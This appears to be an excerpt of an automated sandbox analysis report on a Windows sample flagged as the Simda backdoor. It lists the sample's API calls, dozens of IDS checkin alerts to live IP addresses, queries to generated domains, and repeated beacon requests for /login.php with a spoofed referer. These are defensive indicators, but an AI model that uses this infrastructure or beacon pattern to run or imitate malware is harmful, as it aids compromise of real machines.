Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01517680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,8_2_01517680
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0152E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,8_2_0152E6B0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0266E0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_0266E0FB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56913 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56872 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56875 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56865 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56870 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56864 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56911 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56874 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56883 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.9:55552
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56905 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56965 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56871 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56915 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56860 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56888 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56873 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56869 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56967 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56884 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56961 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56861 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56960 -> 76.223.67.189:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56912 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56964 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49276 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56966 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55973 -> 52.34.198.229:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55032 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54292 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62213 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55033 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54954 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54962 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54956 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49269 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62644 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:49277 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62612 -> 178.162.203.211:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62603 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62592 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62628 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54963 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.9:55413
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62618 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62614 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62605 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62604 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62606 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62610 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62620 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62619 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62627 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62658 -> 178.162.203.211:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62616 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62638 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62617 -> 178.162.203.211:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62611 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62643 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62637 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62667 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62624 -> 75.2.71.199:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62212 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62615 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62609 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62623 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62366 -> 178.162.203.211:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62607 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62626 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62634 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62650 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62608 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62645 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62370 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62593 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62625 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54953 -> 85.17.31.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54955 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62648 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:62613 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56880 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56876 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56942 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54978 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55002 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56896 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:56920 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:55020 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54964 -> 99.83.170.3:443
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.9:54965 -> 188.114.96.3:443
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\apppatch\svchost.exeDomain query: vonyryk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: volyquk.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: qexysev.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: pumywov.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 99.83.170.3 443Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 23.253.46.64 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: lymytuj.com
Source: C:\Windows\apppatch\svchost.exeDomain query: ganyzas.com
Source: C:\Windows\apppatch\svchost.exeDomain query: lyvymej.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 85.17.31.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeDomain query: vofybet.com
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
Queries Google from non browser process on port 80
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vonypom.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
